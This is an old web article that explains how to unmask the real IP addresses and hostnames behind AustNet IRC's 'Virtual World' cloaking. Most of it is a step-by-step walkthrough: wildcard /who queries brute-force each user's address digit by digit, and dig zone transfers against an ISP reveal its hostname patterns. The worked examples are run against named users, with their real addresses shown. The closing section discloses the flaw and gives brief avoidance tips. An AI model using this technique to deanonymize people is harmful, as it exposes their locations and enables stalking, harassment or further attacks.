|
IRCHelper.co.uk |
|
|
Hacking AustNet's Virtual Worlds by Dogcow The following text applies. It explains how the Virtual World protection used on the irc servers can be hacked :(( Reference Links: * AustNet (http://www.austnet.org/) * AustNet Virtual Worlds (http://www.austnet.org/virtualworld/index.htm l) * An automated hack in Perl by cyrax (http://www.2600.org.au/austip.pl) Some background info: AustNet's Virtual World service cloaks a user's IP address by means of an individually allocated "Virtual World Account" which is used to replace a part of the user's hostname if it reverse resolves to a name or the last two bits of an IP address if it does not. This state corresponds to a user having mode +v set on their IRC client. Mode +v is set by default when a user connects to the Aus tNet IRC Network. Unless the user is deliberately sets this to mode -v or initiates or accepts a DCC connection from another user, all transactions are masked using this information. Examples of these masked hostnames include: *** Dogcow has IP number: vw-7714.2600.org.au (actual hostname is 2600.org.au) *** Dogcow has IP number: 203.15.198.9086 (actual address is 203.15.94.143) The Hack: The hack consists of a brute force lookup using a /who query. The /who query on AustNet, while returning masked information, is actually based on real, unmasked addresses. Having said this, I should split the explanation of the methods into two separate parts. This is because an IP address query can take less than 30 seconds and requires no external lookup information and a hostname based query requires information on the host naming pattern from the ISP. The only final caveat is that you need to be on the same channel as the user you are tracking down or they need to be user mode -i (not set by default). IP address queries: Here is a query on a friend of mine... *** ^KaRaG^ is NiNjaH@203.15.198.9092 (?) Note the masked IP address here. The only real part is the 203.15. The rest is fake, and hence this is the part we need to guess. *** ^KaRaG^ is on channels #conspiracy *** ^KaRaG^ is on IRC via server iinet.wa.au.austnet.org (iiNet Technologies Au stNet IRC, WA) Here is the result of my first query: /who 203.15.1* *** 203.15.1* :End of /WHO list. And so on... /who 203.15.2* *** 203.15.2* :End of /WHO list. *** 203.15.3* :End of /WHO list. *** 203.15.4* :End of /WHO list. *** 203.15.5* :End of /WHO list. *** 203.15.6* :End of /WHO list. *** 203.15.7* :End of /WHO list. *** 203.15.8* :End of /WHO list. #conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ? *** 203.15.9* :End of /WHO list. Now, we have a hit. The thing to remember is not to look at the NiNjaH @203.15.198.9092 ? bit, but that we got a hit when we queried 203.15.9*. This is where most people seem to get lost. Just remember that /who doesn't return live information - it returns masked information based on a live query. Having gotten a hit on 203.15.9*, we now iterate through the rest of the numbers. Remember - we don't care what the match says - it's the fact we get a match on our target at all! *** 203.15.90* :End of /WHO list. Here is the result of my next query: /who 203.15.90* *** 203.15.91* :End of /WHO list. *** 203.15.92* :End of /WHO list. *** 203.15.93* :End of /WHO list. #conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ? *** 203.15.94* :End of /WHO list. We've now had another hit, this time on /who 203.15.94* Given that we can't have a number higher than 255 in an IP address, we iterate to the next bit. #conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ? *** 203.15.94.1* :End of /WHO list. Now we start with /who 203.15.94.1* and we get a hit first time, so we then keep going, iterating on the next number *** 203.15.94.10* :End of /WHO list. *** 203.15.94.11* :End of /WHO list. *** 203.15.94.12* :End of /WHO list. *** 203.15.94.13* :End of /WHO list. #conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ? *** 203.15.94.14* :End of /WHO list. Bingo, we've now gotten a hit on: /who 203.15.14* and hence keep going for the last number of the IP address. We're almost there. *** 203.15.94.140* :End of /WHO list. *** 203.15.94.141* :End of /WHO list. *** 203.15.94.142* :End of /WHO list. *** 203.15.94.143* :End of /WHO list. *** 203.15.94.144* :End of /WHO list. *** 203.15.94.145* :End of /WHO list. *** 203.15.94.146* :End of /WHO list. *** 203.15.94.147* :End of /WHO list. *** 203.15.94.148* :End of /WHO list. #conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ? *** 203.15.94.149* :End of /WHO list. Okay, done: /who 203.15.94.149 #conspiracy ^KaRaG^ Hv 1 NiNjaH@203.15.198.9092 ? *** 203.15.94.149 :End of /WHO list. Just a final query without the * to confirm: /who 203.15.94.149 Hostname based queries: Put simply, this is where things get more difficult, and for two reasons. The first is that you need to know the host naming patterns for the ISP your targeted user is on and the second is that most people (ie Windows users) won't have access to the tools that allow them to do abstract lookups or zone transfers from an ISP. In particular I am referring to a tool called dig, which is typically included on Unix-based operating systems like the *BSD ones and Linux. Firstly we'll start with what I call an easy ISP. In this case I chose KaneToa d from #2600. First we start with a /whois query: *** KaneToad is winblows@vw-13663.goulburn.net.au (dammn ure nosey arnt you) *** KaneToad is on channels #2600 *** KaneToad is on IRC via server powerup.qld.au.austnet.org ([202.139.235.220] PowerUp Internet (07) 3249-2600) Okay, so he's at goulburn.net.au We start off with a simple enough nslookup query to find goulburn.net.au's name server address: [root@spooks /root]# nslookup Default Server: spooks.2600.org.au Address: 203.25.224.26 > set q=ns > goulburn.net.au Server: spooks.2600.org.au Address: 203.25.224.26 Non-authoritative answer: goulburn.net.au nameserver = netspace.nspace.com.au goulburn.net.au nameserver = moebius.goulburn.net.au Authoritative answers can be found from: moebius.goulburn.net.au internet address = 203.28.11.1 > exit Now, we attempt to get a listing of every hostname from this ISP. This is called a zone transfer (AXFR) and is usually done at a user level with a program called dig. For a full zone transfer of goulburn.net.au, we use the following command: [root@spooks /root]# dig @203.28.11.1 goulburn.net.au axfr in | more In this case the "@203.28.11.1" just tells dig which nameserver in particular to query, the "goulburn.net.au axfr in" says we want an all zone transfer for go ulburn.net.au and the "| more" just means I'm piping the output through more. The output can also be piped through grep if you're after a specific pattern. Keep in mind some smart ISP's (read: the better ones) have blocked AXFR's from their primary nameservers to anything but their specified secondary nameservers , so this doesn't always work. If it doesn't, jump onto another IRC network that doesn't offer masking at all and just check out some popular channels to see the patterns. It's obviously not as fast as this, but it works. The first two screens of output from this command were: ; <<>> DiG 8.1 <<>> @203.28.11.1 goulburn.net.au axfr in ; (1 server found) $ORIGIN goulburn.net.au. @ 1D IN SOA moebius root.netspace.nspace.com.au. ( 1999031700 ; serial 3H ; refresh 1H ; retry 1W ; expiry 1D ) ; minimum 1D IN NS moebius 1D IN NS netspace.nspace.com.au. 1D IN MX 10 moebius 1D IN MX 20 netspace.nspace.com.au. 1D IN A 203.28.11.1 www2 1D IN A 203.28.11.49 loghost 1D IN CNAME localhost localhost 1D IN A 127.0.0.1 news 1D IN CNAME news.syd.connect.com.au. b-frame 1D IN A 203.28.11.28 netspace 1D IN CNAME netspace.nspace.com.au. cantor 1D IN A 203.28.11.30 euclid 1D IN A 203.28.11.36 mail 1D IN CNAME moebius mailhost 1D IN CNAME moebius nexthop 1D IN A 203.63.118.62 library 1D IN A 203.28.11.118 council 1D IN A 203.28.11.20 max-01 1D IN A 203.28.11.34 guevara 1D IN A 203.28.11.40 godel 1D IN A 203.28.11.27 ppp001 1D IN A 203.28.11.101 ppp002 1D IN A 203.28.11.102 ppp003 1D IN A 203.28.11.103 ppp004 1D IN A 203.28.11.104 ppp005 1D IN A 203.28.11.105 ppp006 1D IN A 203.28.11.106 ppp007 1D IN A 203.28.11.107 ppp008 1D IN A 203.28.11.108 ppp010 1D IN A 203.28.11.110 ppp011 1D IN A 203.28.11.111 ppp009 1D IN A 203.28.11.109 ppp012 1D IN A 203.28.11.112 ppp013 1D IN A 203.28.11.113 ppp014 1D IN A 203.28.11.114 ppp015 1D IN A 203.28.11.115 ppp016 1D IN A 203.28.11.116 max-01-001 1D IN A 203.28.11.137 ppp017 1D IN A 203.28.11.117 max-01-002 1D IN A 203.28.11.138 ppp020 1D IN A 203.28.11.120 aleph 1D IN A 203.28.11.24 max-01-003 1D IN A 203.28.11.139 ppp021 1D IN A 203.28.11.121 ppp019 1D IN A 203.28.11.119 max-01-004 1D IN A 203.28.11.140 ppp022 1D IN A 203.28.11.122 max-01-005 1D IN A 203.28.11.141 ppp023 1D IN A 203.28.11.123 ts-01 1D IN A 203.28.11.33 max-01-006 1D IN A 203.28.11.142 ppp024 1D IN A 203.28.11.124 max-01-007 1D IN A 203.28.11.143 ppp025 1D IN A 203.28.11.125 euler 1D IN A 203.28.11.26 Now in that, we can see two distinct patterns for dialup users. the pppXXX.gou lburn.net.au pattern and the max-XX-XXX.goulburn.net.au pattern. This is where we start our /who queries in much the same way as we did with the numeric addr esses. *** ppp*goulburn.net.au :End of /WHO list. So there was no result on the first pattern we found. Lets now try the second. #perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au *** max*goulburn.net.au :End of /WHO list. Bingo. Now lets start iterating the numbers. #perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au *** max-0*goulburn.net.au :End of /WHO list. Okay, match on the zero. Lets keep going. *** max-00*goulburn.net.au :End of /WHO list. #perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au *** max-01*goulburn.net.au :End of /WHO list. #perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au *** max-01-*goulburn.net.au :End of /WHO list. #perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au *** max-01-0*goulburn.net.au :End of /WHO list. *** max-01-00*goulburn.net.au :End of /WHO list. *** max-01-01*goulburn.net.au :End of /WHO list. #perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au *** max-01-02*goulburn.net.au :End of /WHO list. *** max-01-020*goulburn.net.au :End of /WHO list. *** max-01-021*goulburn.net.au :End of /WHO list. *** max-01-022*goulburn.net.au :End of /WHO list. *** max-01-023*goulburn.net.au :End of /WHO list. *** max-01-024*goulburn.net.au :End of /WHO list. *** max-01-025*goulburn.net.au :End of /WHO list. *** max-01-026*goulburn.net.au :End of /WHO list. *** max-01-027*goulburn.net.au :End of /WHO list. *** max-01-028*goulburn.net.au :End of /WHO list. #perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au *** max-01-029*goulburn.net.au :End of /WHO list. Okay, we're done. Now one last one to confirm. #perl KaneToad H@v 3 winblows@vw-13663.goulburn.net.au *** max-01-029.goulburn.net.au :End of /WHO list. Confirmed. Okay. That was an example of an easy ISP. In comparison, a large ISP may have many letter-based patterns which aren't located easily (or quickly) using a dig-style query. In this case you may need to brute force the pattern itself. An example of this is Telstra BigPond, because they (quite sensibly) don't allow axfr queries: [root@spooks /root]# dig @139.134.2.2 tmns.net.au axfr in |more ; <<>> DiG 8.1 <<>> @139.134.2.2 tmns.net.au axfr in ; (1 server found) ;; Received 0 answers (0 records). ;; FROM: spooks.2600.org.au to SERVER: 139.134.2.2 ;; WHEN: Sat Apr 3 11:58:45 1999 In this case we'll go on what we can find in webserver logs or on other IRC net works. Their patterns are generally something like the following: cwip-t-XXXX-p-XXX-X.tmns.net.au spip-a-XXX-pool-XX.tmns.net.au ldip-t-XXX-p-XXX-XXX.tmns.net.au peip-a-XXX-pool-XXX.tmns.net.au bdip-t-XXX-p-XXX-XX.tmns.net.au tvip-a-XXX-pool-XXX.tmns.net.au cf-aXX-pool-X.tmns.net.au In any case, as you can see, it's a little more difficult than goulburn.net.au. Lets start again with a /whois query: *** narcan is ~root@vw-29153.tmns.net.au (root) *** narcan is on channels @#2600 *** narcan is on IRC via server wantree.wa.au.austnet.org ([203.27.235.3] Wantr ee, Perth, AUSTNet Server) Now lets start the guessing: (3 non-matches deleted) *** a*tmns.net.au :End of /WHO list. (2 non-matches deleted) *** b*tmns.net.au :End of /WHO list. *** c*tmns.net.au :End of /WHO list. *** d*tmns.net.au :End of /WHO list. *** e*tmns.net.au :End of /WHO list. *** f*tmns.net.au :End of /WHO list. *** g*tmns.net.au :End of /WHO list. *** h*tmns.net.au :End of /WHO list. *** i*tmns.net.au :End of /WHO list. *** j*tmns.net.au :End of /WHO list. *** k*tmns.net.au :End of /WHO list. *** l*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** m*tmns.net.au :End of /WHO list. Okay, we found narcan at m*.tmns.net.au. Since we have no idea what the 4 letter pattern is, lets keep guessing. *** ma*tmns.net.au :End of /WHO list. *** mb*tmns.net.au :End of /WHO list. *** mc*tmns.net.au :End of /WHO list. *** md*tmns.net.au :End of /WHO list. *** me*tmns.net.au :End of /WHO list. *** mf*tmns.net.au :End of /WHO list. *** mg*tmns.net.au :End of /WHO list. *** mh*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** mi*tmns.net.au :End of /WHO list. Bingo - mi*tmns.net.au *** mi-*tmns.net.au :End of /WHO list. Just checking it's not mi-*tmns.net.au - checking because it's quicker than brute forcing another 2 whole letters. *** mi-t*tmns.net.au :End of /WHO list. *** mi-a*tmns.net.au :End of /WHO list. Straying off track for a sec - lets see if it's a mi*-t*tmns.net.au or mi*-a*tmns.net.au address... *** mi*-t*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** mi*-a*tmns.net.au :End of /WHO list. Okay so it's mi*-a*tmns.net.au *** mia*-a*tmns.net.au :End of /WHO list. *** mib*-a*tmns.net.au :End of /WHO list. *** mic*-a*tmns.net.au :End of /WHO list. *** mid*-a*tmns.net.au :End of /WHO list. *** mie*-a*tmns.net.au :End of /WHO list. *** mif*-a*tmns.net.au :End of /WHO list. *** mig*-a*tmns.net.au :End of /WHO list. *** mih*-a*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** mii*-a*tmns.net.au :End of /WHO list. And now we move to the last letter... *** miia-a*tmns.net.au :End of /WHO list. *** miib-a*tmns.net.au :End of /WHO list. *** miic-a*tmns.net.au :End of /WHO list. *** miid-a*tmns.net.au :End of /WHO list. *** miie-a*tmns.net.au :End of /WHO list. *** miif-a*tmns.net.au :End of /WHO list. *** miig-a*tmns.net.au :End of /WHO list. *** miih-a*tmns.net.au :End of /WHO list. *** miii-a*tmns.net.au :End of /WHO list. *** miij-a*tmns.net.au :End of /WHO list. *** miik-a*tmns.net.au :End of /WHO list. *** miil-a*tmns.net.au :End of /WHO list. *** miim-a*tmns.net.au :End of /WHO list. *** miin-a*tmns.net.au :End of /WHO list. *** miio-a*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a*tmns.net.au :End of /WHO list. Okay so it's miip-a*tmns.net.au - onto the numbers... #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a-0*tmns.net.au :End of /WHO list. It's pretty easy from here on it - just guessing numbers... #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a-00*tmns.net.au :End of /WHO list. *** miip-a-001*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a-002*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a-002-p*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a-002-pool*tmns.net.au :End of /WHO list. We try the "pool" bit first so we don't waste time. If no match on pool, go back to "p-" *** miip-a-002-pool-0*tmns.net.au :End of /WHO list. *** miip-a-002-pool-1*tmns.net.au :End of /WHO list. #teens shelly_p Hv 2 m_piscione@vw-24041.tmns.net.au shell #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a-002-pool-2*tmns.net.au :End of /WHO list. #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a-002-pool-20*tmns.net.au :End of /WHO list. *** miip-a-002-pool-20.tmns.net.au :End of /WHO list. *** miip-a-002-pool-200.tmns.net.au :End of /WHO list. *** miip-a-002-pool-201.tmns.net.au :End of /WHO list. *** miip-a-002-pool-202.tmns.net.au :End of /WHO list. *** miip-a-002-pool-203.tmns.net.au :End of /WHO list. #2600 narcan G@v 2 ~root@vw-29153.tmns.net.au root *** miip-a-002-pool-204.tmns.net.au :End of /WHO list. The last query there shows the target hostname. Time for a final nslookup: [root@spooks /root]# nslookup miip-a-002-pool-204.tmns.net.au Server: spooks.2600.org.au Address: 203.25.224.26 Name: miip-a-002-pool-204.tmns.net.au Address: 139.134.215.204 As you can see the process for a longer hostname with a relatively smart ISP is quite a bit longer. This lookup took me just on two minutes. Lookup avoidance: Without going into detail about what this information, once found, can be used for, the obvious means of avoidance is to hide in plain sight and set yourself mode +i. The other way is simply to get yourself an operating system that doesn't care what other people might do to it and set yourself mode -v, making it somewhat of a non-event to look you up. At an ISP level, they can prevent peopl e from getting a zone transfer by setting the "allow-transfer" directive in named.conf to the address of their designated secondary nameservers if they are us ing BIND. Conclusion: As you have seen, hostname lookups on AustNet are certainly not brain surgery. In fact, they are laughably far from it. Having said this, other networks that offer hostname masking (such as xnet) do not suffer from the same bug. Given Austnet's reluctance to release the source code for their current IRCd from their own site let alone their services at all, it's a perfect example of a close d source bug not being fixed due to either lack of resources or a covert agenda allowing those with knowledge to subvert a public policy of universal user protection as is preached on their Virtual World web page.
|